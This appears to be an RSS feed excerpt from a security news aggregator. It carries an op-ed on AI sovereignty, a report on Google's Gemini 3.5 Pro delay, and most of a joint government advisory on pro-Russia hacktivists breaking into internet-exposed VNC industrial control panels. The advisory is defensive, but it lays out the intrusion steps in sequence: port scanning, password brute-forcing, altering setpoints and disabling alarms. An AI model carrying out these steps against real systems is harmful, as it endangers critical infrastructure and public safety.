<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3694392/it-security-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694392/it-security-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The downsides of switching from Android to iPhone]]></title>
<description><![CDATA[Here are a few things to know if you're leaving Android for iPhone.]]></description>
<link>https://tsecurity.de/de/3694057/it-nachrichten/the-downsides-of-switching-from-android-to-iphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694057/it-nachrichten/the-downsides-of-switching-from-android-to-iphone/</guid>
<pubDate>Sat, 25 Jul 2026 16:47:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Here are a few things to know if you're leaving Android for iPhone.]]></content:encoded>
</item>
<item>
<title><![CDATA[Valve begin improving account switching in the latest Steam Beta]]></title>
<description><![CDATA[Account switching is still not great on Steam but it seems Valve are aware and have started making some tweaks to make it a smoother experience.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3693712/linux-tipps/valve-begin-improving-account-switching-in-the-latest-steam-beta/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693712/linux-tipps/valve-begin-improving-account-switching-in-the-latest-steam-beta/</guid>
<pubDate>Sat, 25 Jul 2026 11:14:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Account switching is still not great on Steam but it seems Valve are aware and have started making some tweaks to make it a smoother experience.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/947785102id29449gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/valve-begin-improving-account-switching-in-the-latest-steam-beta/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure]]></title>
<description><![CDATA[Summary
Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eas...]]></description>
<link>https://tsecurity.de/de/3693383/sicherheitsluecken/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693383/sicherheitsluecken/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/</guid>
<pubDate>Sat, 25 Jul 2026 09:15:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><strong>Note:</strong> This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet <a href="https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology" title="Primary Mitigations to Reduce Cyber Threats to Operational Technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a> and European Cybercrime Centre’s (EC3) <a href="https://www.europol.europa.eu/media-press/newsroom/news/global-operation-targets-noname05716-pro-russian-cybercrime-network" target="_blank" title="Operation Eastwood" data-entity-type="external">Operation Eastwood</a>, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.</p>
<p>FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:</p>
<ul>
<li>U.S. Department of Energy (DOE)</li>
<li>U.S. Environmental Protection Agency (EPA)</li>
<li>U.S. Department of Defense Cyber Crime Center (DC3)</li>
<li>Europol European Cybercrime Centre (EC3)</li>
<li>EUROJUST – European Union Agency for Criminal Justice Cooperation</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>Canadian Security Intelligence Service (CSIS)</li>
<li>Czech Republic Military Intelligence (VZ)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)</li>
<li>Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)</li>
<li>French National Cybercrime Unit – Gendarmerie Nationale (UNC)</li>
<li>French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)</li>
<li>German Federal Office for Information Security (BSI)</li>
<li>Italian State Police (PS)</li>
<li>Latvian State Police (VP)</li>
<li>Lithuanian Criminal Police Bureau (LKPB)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>Romanian National Police (PR)</li>
<li>Spanish Civil Guard (GC)</li>
<li>Spanish National Police (CNP)</li>
<li>Swedish Polisen (SC3)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
</ul>
<p>The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector" title="Food and Agriculture Sector">Food and Agriculture</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a>.</p>
<p>The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the <a href="https://www.cisa.gov/#Mitigations" title="Mitigations"><strong>Mitigations </strong></a>section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia" title="Russia Threat Overview and Advisories">Russia Threat Overview and Advisories</a> webpage.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-12/aa25-343a-pro-russia-hacktivists-conduct-attacks_0.pdf" class="c-file__link" target="_blank">Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure</a>
    <span class="c-file__size">(PDF,       1.53 MB
  )</span>
  </div>
</div>
<h2><strong>Background and Development of Pro-Russia Hacktivist Groups</strong></h2>
<p>Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.</p>
<h3><strong>Cyber Army of Russia Reborn</strong></h3>
<p>The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see<strong> </strong><a href="https://www.cisa.gov/#AppB" title="Appendix B"><strong>Appendix B: Additional Designators Used for Cited Groups</strong></a>)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.</p>
<p>In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine.</p>
<p>CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.</p>
<p>In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms.</p>
<p>The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.</p>
<h3><strong>NoName057(16)</strong></h3>
<p>The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool <code>DDoSia</code>, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.</p>
<p>Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host <code>DDoSia</code> and share materials and TTPs with their followers. </p>
<p>In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.</p>
<h3><strong>Z-Pentest</strong></h3>
<p>Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.</p>
<p>Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.</p>
<h3><strong>Sector16</strong></h3>
<p>Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives.</p>
<p>Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.</p>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the MITRE ATT&amp;CK<sup>®</sup> <a href="https://attack.mitre.org/versions/v18/matrices/enterprise/" title="Matrix for Enterprise framework" data-entity-type="external">Matrix for Enterprise framework</a>, version 18. See the <a href="https://www.cisa.gov/#MITRE" title="MITRE ATT&amp;CK Tactics and Techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3><strong>TTP Overview</strong></h3>
<p>Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.</p>
<p>Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.</p>
<p>Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Sector">Water and Wastewater</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector" title="Food and Agriculture Sector" data-entity-type="external">Food and Agriculture</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a> Sectors.</p>
<p>Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:</p>
<ul>
<li>Scan for vulnerable devices on the internet [<a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883" data-entity-type="external">T0883</a>] with open VNC ports [<a href="https://attack.mitre.org/versions/v18/techniques/T1595/002/" target="_blank" title="T1595.002" data-entity-type="external">T1595.002</a>].</li>
<li>Initiate temporary virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v18/techniques/T1583/003/" target="_blank" title="T1583.003" data-entity-type="external">T1583.003</a>] to execute password brute force software.</li>
<li>Use VNC software to access hosts [<a href="https://attack.mitre.org/versions/v18/techniques/T1021/005/" target="_blank" title="T1021.005" data-entity-type="external">T1021.005</a>].</li>
<li>Confirm connection to the vulnerable device [<a href="https://attack.mitre.org/versions/v18/techniques/T0886/" target="_blank" title="T0886" data-entity-type="external">T0886</a>].</li>
<li>Brute force the password, if required [<a href="https://attack.mitre.org/versions/v18/techniques/T1110/003/" target="_blank" title="T1110.003" data-entity-type="external">T1110.003</a>].</li>
<li>Gain access to HMI devices [<a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883" data-entity-type="external">T0883</a>], typically with default [<a href="https://attack.mitre.org/versions/v18/techniques/T0812/" target="_blank" title="T0812" data-entity-type="external">T0812</a>], weak, or no passwords [<a href="https://attack.mitre.org/versions/v18/techniques/T0859/" target="_blank" title="T0859" data-entity-type="external">T0859</a>].</li>
<li>Log the confirmed vulnerable device IP address, port, and password.</li>
<li>Using the HMI graphical interface [<a href="https://attack.mitre.org/versions/v18/techniques/T0823/" target="_blank" title="T0823" data-entity-type="external">T0823</a>], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [<a href="https://attack.mitre.org/versions/v18/techniques/T0828/" target="_blank" title="T0828" data-entity-type="external">T0828</a>]:
<ul>
<li>Modify usernames/passwords [<a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892" data-entity-type="external">T0892</a>];</li>
<li>Modify parameters [<a href="https://attack.mitre.org/versions/v18/techniques/T0836/" target="_blank" title="T0836" data-entity-type="external">T0836</a>];</li>
<li>Modify device name [<a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892" data-entity-type="external">T0892</a>];</li>
<li>Modify instrument settings [<a href="https://attack.mitre.org/versions/v18/techniques/T0831/" target="_blank" title="T0831" data-entity-type="external">T0831</a>];</li>
<li>Disable alarms [<a href="https://attack.mitre.org/versions/v18/techniques/T0878/" target="_blank" title="T0878" data-entity-type="external">T0878</a>];</li>
<li>Create loss of view (a technique that mandates local hands-on operator intervention) [<a href="https://attack.mitre.org/versions/v18/techniques/T0829/" target="_blank" title="T0829" data-entity-type="external">T0829</a>]; and/or</li>
<li>Device restart or shutdown [<a href="https://attack.mitre.org/versions/v18/techniques/T0816/" target="_blank" title="T0816" data-entity-type="external">T0816</a>].</li>
</ul>
</li>
<li>Disconnect from the device, ending the VNC connection.</li>
<li>Research the compromised device company after the intrusion [<a href="https://attack.mitre.org/versions/v18/techniques/T1591/" target="_blank" title="T1591" data-entity-type="external">T1591</a>].</li>
</ul>
<h4><strong>Propagation</strong></h4>
<p>To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.</p>
<h4><strong>Reconnaissance and Initial Access</strong></h4>
<p>The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as <code>Nmap</code> or <code>OPENVAS</code>, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port <code>5900</code> or other nearby ports (<code>5901-5910</code>). Their goal is to gain remote access to HMI devices connected to live control networks.</p>
<p>Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.</p>
<h4><strong>Impact</strong></h4>
<p>While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.</p>
<p>Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation.</p>
<h2><a class="ck-anchor"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <a href="https://www.cisa.gov/#Table1" title="Table 1"><strong>Table 1</strong></a> to <a href="https://www.cisa.gov/#Table10" title="Table 10"><strong>Table 10</strong></a> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<p><a class="ck-anchor"></a></p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 1. Reconnaissance</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Gather Victim Organization Information</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1591/" target="_blank" title="T1591" data-entity-type="external">T1591</a></td>
<td>Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims.</td>
</tr>
<tr>
<td>Active Scanning: Vulnerability Scanning</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1595/002/" target="_blank" title="T1595.002" data-entity-type="external">T1595.002</a></td>
<td>Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2. Resource Development</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Server</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1583/003/" target="_blank" title="T1583.003" data-entity-type="external">T1583.003</a></td>
<td>Threat actors use virtual infrastructure to obfuscate identifiers.</td>
</tr>
</tbody>
</table>
